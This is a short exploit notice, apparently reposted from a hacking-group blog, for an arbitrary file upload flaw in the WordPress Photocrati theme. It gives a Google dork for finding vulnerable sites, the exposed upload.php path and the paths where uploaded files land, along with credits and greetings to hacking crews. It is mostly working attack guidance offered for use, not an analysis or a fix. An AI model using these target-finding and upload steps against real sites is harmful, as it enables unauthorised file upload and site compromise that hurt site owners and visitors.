// Author : s1puT
// Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Grets : QueenAisyah | geek_Defcon | kazutto_kun | Zbyte | Badaki | 1!0N7!N | i.am_geek | Admiral | |Kopral
// Special : fb.com/zone.tn.org | fb.com/AnonymousPalestine.vip | Overload Team | fb.com/inj3ct0rs | fb.com/Pirates.Elite.Officiall | fb.com/Exploit4ar |
// Demo : https://www.youtube.com/watch?v=7Vjiys38noI
// Dork : inurl:/wp-content/themes/photocrati-theme/admin/gallery/
// Exploit : /wp-content/themes/photocrati-theme/admin/gallery/upload.php
// References : http://www.securityfocus.com/bid/68414/info
###############################################################
Proof of Concept
site.com/ or site.com/wordpress/
1. site.com/wp-content/themes/photocrati-theme/admin/gallery/upload.php
2. site.com/wordpress/wp-content/themes/photocrati-theme/admin/gallery/upload.php
file location :
1. site.com/wp-content/themes/photocrati-theme/galleries/post-/file-name.jpg
2. site.com/wp-content/themes/photocrati-theme/galleries/post-/thumbnails/file-name.jpg
1. site.com/wordpress/wp-content/themes/photocrati-theme/galleries/post-/file-name.jpg
2. site.com/wordpress/wp-content/themes/photocrati-theme/galleries/post-/thumbnails/file-name.jpg
Sumber : Ternate Lab Pantesting
0 Komentar